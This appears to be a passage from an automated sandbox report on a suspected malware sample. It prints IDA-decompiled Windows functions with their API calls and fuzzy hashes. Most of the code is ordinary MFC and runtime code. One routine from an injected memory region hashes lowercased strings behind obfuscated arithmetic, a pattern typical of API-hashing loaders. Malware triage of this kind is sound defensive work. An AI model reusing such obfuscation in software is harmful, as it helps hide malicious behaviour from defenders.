                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                      • String ID:
                                                      • API String ID: 1007970657-0
                                                      • Opcode ID: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
                                                      • Instruction ID: 239a3fe864a438b672b26ed0143a2d062fb3f574ffa283ab5bdaab9dccb6ddd8
                                                      • Opcode Fuzzy Hash: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
                                                      • Instruction Fuzzy Hash: 80311D75A00109DFDB14DFB8D985FAEBBB5BF48304F1082A9E549E7281DA30A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040A094(void* __ecx) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int _t5;
                                                      				void* _t15;
                                                      				void* _t18;
                                                      				void* _t19;
                                                      
                                                      				_t15 = __ecx;
                                                      				if((E0040C981(__ecx) & 0x40000000) != 0) {
                                                      					L6:
                                                      					_t5 = E00409BF3(_t15, _t15, _t18, __eflags);
                                                      					asm("sbb eax, eax");
                                                      					return  ~( ~_t5);
                                                      				}
                                                      				_t19 = E00403ED6();
                                                      				if(_t19 == 0) {
                                                      					goto L6;
                                                      				}
                                                      				_t18 = GetKeyState;
                                                      				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                      					goto L6;
                                                      				} else {
                                                      					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                      					return 1;
                                                      				}
                                                      			}

                                                      APIs
                                                        • Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C
                                                      • GetKeyState.USER32(00000010), ref: 0040A0B8
                                                      • GetKeyState.USER32(00000011), ref: 0040A0C1
                                                      • GetKeyState.USER32(00000012), ref: 0040A0CA
                                                      • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0040A0E0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: State$LongMessageSendWindow
                                                      • String ID:
                                                      • API String ID: 1063413437-0
                                                      • Opcode ID: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
                                                      • Instruction ID: 09be2279584ced2a5f59b9ad430127016d441750cd54d9fdae9847761112cc12
                                                      • Opcode Fuzzy Hash: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
                                                      • Instruction Fuzzy Hash: 2CF0277234034E27EA207A764C41FEB71145F92BD8F018A3AB742FB1D1C9B9D812667A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E004313E8() {
                                                      				signed int _v8;
                                                      				char _v16;
                                                      				void* __esi;
                                                      				signed int _t8;
                                                      				intOrPtr* _t15;
                                                      				intOrPtr _t16;
                                                      				char _t20;
                                                      				intOrPtr _t22;
                                                      				intOrPtr _t23;
                                                      				signed int _t24;
                                                      				int _t25;
                                                      				signed int _t27;
                                                      
                                                      				_t8 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t8 ^ _t27;
                                                      				_t24 = 0;
                                                      				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                      					L4:
                                                      					_t25 = GetACP();
                                                      				} else {
                                                      					_t20 = _v16;
                                                      					_t15 =  &_v16;
                                                      					if(_t20 == 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						do {
                                                      							_t15 = _t15 + 1;
                                                      							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                      							_t20 =  *_t15;
                                                      						} while (_t20 != 0);
                                                      						if(_t24 == 0) {
                                                      							goto L4;
                                                      						}
                                                      					}
                                                      				}
                                                      				return E0041E5DF(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                      			}

                                                      APIs
                                                      • GetThreadLocale.KERNEL32 ref: 004313FB
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0043140D
                                                      • GetACP.KERNEL32 ref: 00431436
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Locale$InfoThread
                                                      • String ID:
                                                      • API String ID: 4232894706-0
                                                      • Opcode ID: dc1e58e87ce783da76fdcf1c714e2f89cf3d2ce207ad148ed9ce44f107e423d5
                                                      • Instruction ID: df8f4565a9d497241193607ad36bdfa153b49a4b8716d654c6ad28840d039b96
                                                      • Opcode Fuzzy Hash: dc1e58e87ce783da76fdcf1c714e2f89cf3d2ce207ad148ed9ce44f107e423d5
                                                      • Instruction Fuzzy Hash: 5FF0FC31E002286BCB119FB5D8156EF77F4AF19B45F40516DDD41E7350E724AE0587D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E004078B8(struct HWND__* _a4, signed int _a8) {
                                                      				struct _WINDOWPLACEMENT _v48;
                                                      				int _t16;
                                                      
                                                      				if(E00407777() == 0) {
                                                      					if((_a8 & 0x00000003) == 0) {
                                                      						if(IsIconic(_a4) == 0) {
                                                      							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                      						} else {
                                                      							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                      						}
                                                      						if(_t16 == 0) {
                                                      							return 0;
                                                      						} else {
                                                      							return E0040786C( &(_v48.rcNormalPosition), _a8);
                                                      						}
                                                      					}
                                                      					return 0x12340042;
                                                      				}
                                                      				return  *0x446284(_a4, _a8);
                                                      			}






                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24413dd022ae49eedaea9ca8cc9c3b40e71d78154d6133483c215239823d5632
                                                      • Instruction ID: 807d2f643473691e9cf4c94b7d214811ee118392236929a0e394f9924f614926
                                                      • Opcode Fuzzy Hash: 24413dd022ae49eedaea9ca8cc9c3b40e71d78154d6133483c215239823d5632
                                                      • Instruction Fuzzy Hash: 12F0317290810DABDF016F61CC489AE3B69BB40384B14C432FD05E61A0DB38FB61DB9B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E02252C80(signed short* __ecx) {
                                                      				void* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _t115;
                                                      				signed int _t117;
                                                      				signed int _t120;
                                                      				signed int _t121;
                                                      				signed int _t135;
                                                      				signed int _t137;
                                                      				signed int _t139;
                                                      				signed short* _t140;
                                                      
                                                      				_v28 = 0x6d165257;
                                                      				_v24 = 0x786b6a44;
                                                      				_v20 = 0x31acd7f1;
                                                      				_t140 = __ecx;
                                                      				asm("stosd");
                                                      				_t120 = 0x7d;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_v32 = 0xfcba;
                                                      				_v32 = _v32 ^ 0xa6c2fe7d;
                                                      				_v32 = _v32 >> 0x10;
                                                      				_v32 = _v32 / _t120;
                                                      				_v32 = _v32 << 0xd;
                                                      				_v32 = _v32 << 0xd;
                                                      				_v32 = _v32 ^ 0x54000000;
                                                      				_v36 = 0x4f36;
                                                      				_v36 = _v36 + 0xae67;
                                                      				_v36 = _v36 + 0xffffa2bb;
                                                      				_v36 = _v36 + 0xa00e;
                                                      				_t121 = 0x62;
                                                      				_v36 = _v36 / _t121;
                                                      				_v36 = _v36 + 0xffffc4b7;
                                                      				_t137 = 0x32;
                                                      				_v36 = _v36 / _t137;
                                                      				_v36 = _v36 ^ 0xc4105c7d;
                                                      				_v36 = _v36 ^ 0xc10eeb48;
                                                      				_v36 = 0x2c57;
                                                      				_v36 = _v36 >> 4;
                                                      				_v36 = _v36 >> 5;
                                                      				_v36 = _v36 | 0x3b42b64d;
                                                      				_v36 = _v36 ^ 0x3b42b64f;
                                                      				if( *((intOrPtr*)(__ecx)) != 0) {
                                                      					do {
                                                      						_t117 = _v32;
                                                      						_v36 = 0x4f36;
                                                      						_v36 = _v36 + 0xae67;
                                                      						_v36 = _v36 + 0xffffa2bb;
                                                      						_v36 = _v36 + 0xa00e;
                                                      						_v36 = _v36 / _t121;
                                                      						_v36 = _v36 + 0xffffc4b7;
                                                      						_v36 = _v36 / _t137;
                                                      						_v36 = _v36 ^ 0xc4105c7d;
                                                      						_v36 = _v36 ^ 0xc10eeb48;
                                                      						_v36 = 0x2c57;
                                                      						_v36 = _v36 >> 4;
                                                      						_v36 = _v36 >> 5;
                                                      						_v36 = _v36 | 0x3b42b64d;
                                                      						_v36 = _v36 ^ 0x3b42b64f;
                                                      						_t135 = _v32 << _v36;
                                                      						_t115 =  *_t140 & 0x0000ffff;
                                                      						_t139 = _v32 << _v36;
                                                      						if(_t115 >= 0x41 && _t115 <= 0x5a) {
                                                      							_t115 = _t115 + 0x20;
                                                      						}
                                                      						_v32 = _t115;
                                                      						_t140 =  &(_t140[1]);
                                                      						_v32 = _v32 + _t135;
                                                      						_v32 = _v32 + _t139;
                                                      						_v32 = _v32 - _t117;
                                                      						_t121 = 0x62;
                                                      						_t137 = 0x32;
                                                      					} while ( *_t140 != 0);
                                                      				}
                                                      				return _v32;
                                                      			}


















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Djkx$W,$W,
                                                      • API String ID: 0-3944540934
                                                      • Opcode ID: ffc0239174181879fec72468d9939b9168129a79e6d9457598561d741990d87f
                                                      • Instruction ID: 9e3ac68fde7f6908ee852dbead7ee3a4a43b06c971f0ff55c59bd1deafb03dc6
                                                      • Opcode Fuzzy Hash: ffc0239174181879fec72468d9939b9168129a79e6d9457598561d741990d87f
                                                      • Instruction Fuzzy Hash: 6C41FE726087829FE365CF29D44940BF7E1BBD4664F008E1DE4A596294D3B8DA48CFA3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E004276D9(void* __eax, void* __ebx, void* __edx) {
                                                      				_Unknown_base(*)()* _t8;
                                                      
                                                      				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                      				_t8 = SetUnhandledExceptionFilter(E00424653());
                                                      				 *0x4471e8 = 0;
                                                      				return _t8;
                                                      			}




                                                      0x004276de
                                                      0x004276ee
                                                      0x004276f4
                                                      0x004276fb

                                                      APIs
                                                      • __decode_pointer.LIBCMT ref: 004276E7
                                                        • Part of subcall function 00424653: TlsGetValue.KERNEL32(?,004260DB,0041ED5A,00401B31,?,00401B31,00009618), ref: 00424660
                                                        • Part of subcall function 00424653: TlsGetValue.KERNEL32(00000006,?,004260DB,0041ED5A,00401B31,?,00401B31,00009618), ref: 00424677
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004276EE
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                      • String ID:
                                                      • API String ID: 1958600898-0
                                                      • Opcode ID: 3808dd3035dbb63b1be54f32e5543d30117604471be48c0159c63b21cb962b22
                                                      • Instruction ID: b50555692b2145549f52bd469e7f170773f869d75e69dcd4c824b660d7bbf183
                                                      • Opcode Fuzzy Hash: 3808dd3035dbb63b1be54f32e5543d30117604471be48c0159c63b21cb962b22
                                                      • Instruction Fuzzy Hash: 42C04C5581C2914AFB019775684D3497A049B62614F9494EBA45085252DF9C52C5C16D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E0040B8F6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				unsigned int _t147;
                                                      				signed int _t149;
                                                      				signed int* _t152;
                                                      				intOrPtr _t159;
                                                      				intOrPtr* _t160;
                                                      				unsigned int _t163;
                                                      				unsigned int _t166;
                                                      				signed int* _t170;
                                                      				signed int* _t173;
                                                      				unsigned int _t177;
                                                      				unsigned int _t181;
                                                      				unsigned int _t185;
                                                      				signed int _t189;
                                                      				signed int* _t194;
                                                      				signed int _t195;
                                                      				unsigned int _t196;
                                                      				intOrPtr* _t197;
                                                      				unsigned int _t198;
                                                      				signed int _t213;
                                                      				signed int _t217;
                                                      				unsigned int _t224;
                                                      				void* _t225;
                                                      
                                                      				_t200 = __ecx;
                                                      				_push(0x70);
                                                      				E0041F6EA(E004324BC, __ebx, __edi, __esi);
                                                      				_t222 = __ecx;
                                                      				 *((intOrPtr*)(_t225 - 0x10)) = 0;
                                                      				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
                                                      				_t189 =  *(_t225 + 8);
                                                      				 *(_t225 - 4) = 0;
                                                      				if(_t189 != 0x111) {
                                                      					__eflags = _t189 - 0x4e;
                                                      					if(_t189 != 0x4e) {
                                                      						__eflags = _t189 - 6;
                                                      						_t224 =  *(_t225 + 0x10);
                                                      						if(_t189 == 6) {
                                                      							E0040B2C5(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E00409C97(_t189, __ecx, _t225, _t224));
                                                      						}
                                                      						__eflags = _t189 - 0x20;
                                                      						if(_t189 != 0x20) {
                                                      							L12:
                                                      							_t147 =  *(_t222 + 0x4c);
                                                      							__eflags = _t147;
                                                      							if(_t147 == 0) {
                                                      								L20:
                                                      								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
                                                      								 *(_t225 + 0x10) = _t149;
                                                      								E00408955(_t225 - 0x14, _t222, 7);
                                                      								_t194 = 0x444a80 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
                                                      								__eflags =  *(_t225 + 8) -  *_t194;
                                                      								 *(_t225 - 0x18) = _t194;
                                                      								if( *(_t225 + 8) !=  *_t194) {
                                                      									L25:
                                                      									_t152 =  *(_t225 - 0x18);
                                                      									_t195 =  *(_t225 + 0x10);
                                                      									 *_t152 =  *(_t225 + 8);
                                                      									_t152[2] = _t195;
                                                      									while(1) {
                                                      										__eflags =  *_t195;
                                                      										if( *_t195 == 0) {
                                                      											break;
                                                      										}
                                                      										__eflags =  *(_t225 + 8) - 0xc000;
                                                      										_push(0);
                                                      										_push(0);
                                                      										if( *(_t225 + 8) >= 0xc000) {
                                                      											_push(0xc000);
                                                      											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
                                                      											while(1) {
                                                      												_t196 = E0040819C();
                                                      												__eflags = _t196;
                                                      												if(_t196 == 0) {
                                                      													break;
                                                      												}
                                                      												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
                                                      												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
                                                      													( *(_t225 - 0x18))[1] = _t196;
                                                      													E00408984(_t225 - 0x14);
                                                      													L102:
                                                      													_t197 =  *((intOrPtr*)(_t196 + 0x14));
                                                      													L103:
                                                      													_push(_t224);
                                                      													_push( *((intOrPtr*)(_t225 + 0xc)));
                                                      													L104:
                                                      													_t159 =  *_t197();
                                                      													L105:
                                                      													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
                                                      													goto L106;
                                                      												}
                                                      												_push(0);
                                                      												_push(0);
                                                      												_push(0xc000);
                                                      												_t198 = _t196 + 0x18;
                                                      												__eflags = _t198;
                                                      												_push(_t198);
                                                      											}
                                                      											_t195 =  *(_t225 + 0x10);
                                                      											L36:
                                                      											_t195 =  *_t195();
                                                      											 *(_t225 + 0x10) = _t195;
                                                      											continue;
                                                      										}
                                                      										_push( *(_t225 + 8));
                                                      										_push( *((intOrPtr*)(_t195 + 4)));
                                                      										_t166 = E0040819C();
                                                      										__eflags = _t166;
                                                      										 *(_t225 + 0x10) = _t166;
                                                      										if(_t166 == 0) {
                                                      											goto L36;
                                                      										}
                                                      										( *(_t225 - 0x18))[1] = _t166;
                                                      										E00408984(_t225 - 0x14);
                                                      										L29:
                                                      										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
                                                      										__eflags = _t213 - 0x44;
                                                      										if(__eflags > 0) {
                                                      											goto L106;
                                                      										}
                                                      										switch( *((intOrPtr*)(_t213 * 4 +  &M0040BE0E))) {
                                                      											case 0:
                                                      												_push( *(__ebp + 0xc));
                                                      												_push(E0040E644(__ebx, __ecx, __edi, __esi, __eflags));
                                                      												goto L44;
                                                      											case 1:
                                                      												_push( *(__ebp + 0xc));
                                                      												goto L44;
                                                      											case 2:
                                                      												__eax = __esi;
                                                      												__eax = __esi >> 0x10;
                                                      												__eflags = __eax;
                                                      												_push(__eax);
                                                      												__eax = __si & 0x0000ffff;
                                                      												_push(__si & 0x0000ffff);
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                      												goto L49;
                                                      											case 3:
                                                      												_push(__esi);
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                      												goto L42;
                                                      											case 4:
                                                      												_push(__esi);
                                                      												L44:
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L105;
                                                      											case 5:
                                                      												__ecx = __ebp - 0x28;
                                                      												E0040E152(__ebp - 0x28) =  *(__esi + 4);
                                                      												__ecx = __ebp - 0x7c;
                                                      												 *((char*)(__ebp - 4)) = 1;
                                                      												 *(__ebp - 0x24) =  *(__esi + 4);
                                                      												__eax = E0040899E(__ecx, __eflags);
                                                      												__eax =  *__esi;
                                                      												__esi =  *(__esi + 8);
                                                      												 *((char*)(__ebp - 4)) = 2;
                                                      												 *(__ebp - 0x5c) = __eax;
                                                      												__eax = E00409CBE(__ecx, __edi, __esi, __eflags, __eax);
                                                      												__eflags = __eax;
                                                      												if(__eflags == 0) {
                                                      													__eax =  *(__edi + 0x4c);
                                                      													__eflags = __eax;
                                                      													if(__eflags != 0) {
                                                      														__ecx = __eax + 0x24;
                                                      														__eax = E00419E94(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
                                                      														__eflags = __eax;
                                                      														if(__eflags != 0) {
                                                      															 *(__ebp - 0x2c) = __eax;
                                                      														}
                                                      													}
                                                      													__eax = __ebp - 0x7c;
                                                      												}
                                                      												_push(__esi);
                                                      												_push(__eax);
                                                      												__eax = __ebp - 0x28;
                                                      												_push(__ebp - 0x28);
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
                                                      												__ecx = __ebp - 0x7c;
                                                      												 *(__ebp - 0x10) = __ebp - 0x28;
                                                      												 *((char*)(__ebp - 4)) = 1;
                                                      												__eax = E0040A420(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
                                                      												goto L59;
                                                      											case 6:
                                                      												__ecx = __ebp - 0x28;
                                                      												E0040E152(__ebp - 0x28) =  *(__esi + 4);
                                                      												_push( *(__esi + 8));
                                                      												 *(__ebp - 0x24) =  *(__esi + 4);
                                                      												__eax = __ebp - 0x28;
                                                      												_push(__ebp - 0x28);
                                                      												__ecx = __edi;
                                                      												 *((char*)(__ebp - 4)) = 3;
                                                      												__eax =  *__ebx();
                                                      												_t95 = __ebp - 0x24;
                                                      												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
                                                      												__eflags =  *_t95;
                                                      												 *(__ebp - 0x10) = __ebp - 0x28;
                                                      												L59:
                                                      												__ecx = __ebp - 0x28;
                                                      												 *((char*)(__ebp - 4)) = 0;
                                                      												__eax = E0040E6B6(__ecx);
                                                      												goto L106;
                                                      											case 7:
                                                      												__eax =  *(__ebp + 0xc);
                                                      												__eax =  *(__ebp + 0xc) >> 0x10;
                                                      												__eflags = __eax;
                                                      												_push(__eax);
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp, __esi);
                                                      												goto L61;
                                                      											case 8:
                                                      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                      												_push( *(__ebp + 0xc) >> 0x10);
                                                      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                      												goto L42;
                                                      											case 9:
                                                      												goto L103;
                                                      											case 0xa:
                                                      												_push(__esi);
                                                      												_push(E0040DEED(__ebx, __ecx, __edi, __esi, __eflags));
                                                      												__eax =  *(__ebp + 0xc);
                                                      												__eax =  *(__ebp + 0xc) >> 0x10;
                                                      												L61:
                                                      												_push(__eax);
                                                      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                      												L49:
                                                      												_push(__eax);
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L105;
                                                      											case 0xb:
                                                      												_push(__esi);
                                                      												goto L87;
                                                      											case 0xc:
                                                      												_push( *(__ebp + 0xc));
                                                      												goto L90;
                                                      											case 0xd:
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L106;
                                                      											case 0xe:
                                                      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                      												_push( *(__ebp + 0xc) >> 0x10);
                                                      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                      												goto L81;
                                                      											case 0xf:
                                                      												__esi = __esi >> 0x10;
                                                      												__eax = __ax;
                                                      												_push(__ax);
                                                      												__eax = __si;
                                                      												goto L81;
                                                      											case 0x10:
                                                      												_push(__esi >> 0x10);
                                                      												__eax = __si & 0x0000ffff;
                                                      												goto L95;
                                                      											case 0x11:
                                                      												_push(E00409C97(__ebx, __ecx, __ebp, __esi));
                                                      												L87:
                                                      												_push( *(__ebp + 0xc));
                                                      												goto L88;
                                                      											case 0x12:
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L105;
                                                      											case 0x13:
                                                      												_push(E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
                                                      												_push(E00409C97(__ebx, __ecx, __ebp, __esi));
                                                      												__eax = 0;
                                                      												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
                                                      												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
                                                      												goto L93;
                                                      											case 0x14:
                                                      												_push( *(__ebp + 0xc));
                                                      												__eax = E0040E644(__ebx, __ecx, __edi, __esi, __eflags);
                                                      												goto L76;
                                                      											case 0x15:
                                                      												_push( *(__ebp + 0xc));
                                                      												__eax = E0040DEED(__ebx, __ecx, __edi, __esi, __eflags);
                                                      												goto L76;
                                                      											case 0x16:
                                                      												__esi = __esi >> 0x10;
                                                      												__eax = __ax;
                                                      												_push(__ax);
                                                      												__eax = __si;
                                                      												_push(__si);
                                                      												_push( *(__ebp + 0xc));
                                                      												__eax = E0040DEED(__ebx, __ecx, __edi, __esi, __eflags);
                                                      												goto L93;
                                                      											case 0x17:
                                                      												_push( *(__ebp + 0xc));
                                                      												goto L75;
                                                      											case 0x18:
                                                      												_push(__esi);
                                                      												L75:
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp);
                                                      												L76:
                                                      												_push(__eax);
                                                      												goto L90;
                                                      											case 0x19:
                                                      												_push(__esi >> 0x10);
                                                      												__eax = __si & 0x0000ffff;
                                                      												goto L79;
                                                      											case 0x1a:
                                                      												__eax = __si;
                                                      												__eflags = __esi;
                                                      												__ecx = __si;
                                                      												_push(__ecx);
                                                      												L79:
                                                      												_push(__eax);
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                      												goto L93;
                                                      											case 0x1b:
                                                      												_push(__esi);
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
                                                      												L81:
                                                      												_push(__eax);
                                                      												goto L88;
                                                      											case 0x1c:
                                                      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                      												_push( *(__ebp + 0xc) >> 0x10);
                                                      												__eax = E00409C97(__ebx, __ecx, __ebp, __esi);
                                                      												goto L92;
                                                      											case 0x1d:
                                                      												__ecx =  *(__ebp + 0xc);
                                                      												__edx = __cx;
                                                      												__ecx =  *(__ebp + 0xc) >> 0x10;
                                                      												__eflags = __eax - 0x2a;
                                                      												__ecx = __cx;
                                                      												 *((intOrPtr*)(__ebp + 8)) = __edx;
                                                      												 *(__ebp + 0xc) = __ecx;
                                                      												if(__eax != 0x2a) {
                                                      													_push(__ecx);
                                                      													_push(__edx);
                                                      													L88:
                                                      													__ecx = __edi;
                                                      													__eax =  *__ebx();
                                                      													goto L106;
                                                      												}
                                                      												_push(E00409C97(__ebx, __ecx, __ebp, __esi));
                                                      												_push( *(__ebp + 0xc));
                                                      												_push( *((intOrPtr*)(__ebp + 8)));
                                                      												goto L96;
                                                      											case 0x1e:
                                                      												_push(__esi);
                                                      												L90:
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L106;
                                                      											case 0x1f:
                                                      												_push(__esi);
                                                      												_push( *(__ebp + 0xc));
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L2;
                                                      											case 0x20:
                                                      												__eax = __si;
                                                      												__eflags = __esi;
                                                      												__ecx = __si;
                                                      												_push(__ecx);
                                                      												L42:
                                                      												_push(__eax);
                                                      												goto L104;
                                                      											case 0x21:
                                                      												__eax =  *(__ebp + 0xc);
                                                      												_push(__esi);
                                                      												__eax =  *(__ebp + 0xc) >> 0x10;
                                                      												__eflags = __eax;
                                                      												L92:
                                                      												_push(__eax);
                                                      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                      												L93:
                                                      												_push(__eax);
                                                      												goto L96;
                                                      											case 0x22:
                                                      												__eax = __si;
                                                      												__eflags = __esi;
                                                      												__ecx = __si;
                                                      												_push(__si);
                                                      												L95:
                                                      												_push(__eax);
                                                      												_push( *(__ebp + 0xc));
                                                      												L96:
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												goto L106;
                                                      											case 0x23:
                                                      												__eax = __si;
                                                      												__esi = __esi >> 0x10;
                                                      												__ecx = __si;
                                                      												_push(__si);
                                                      												_push(__si);
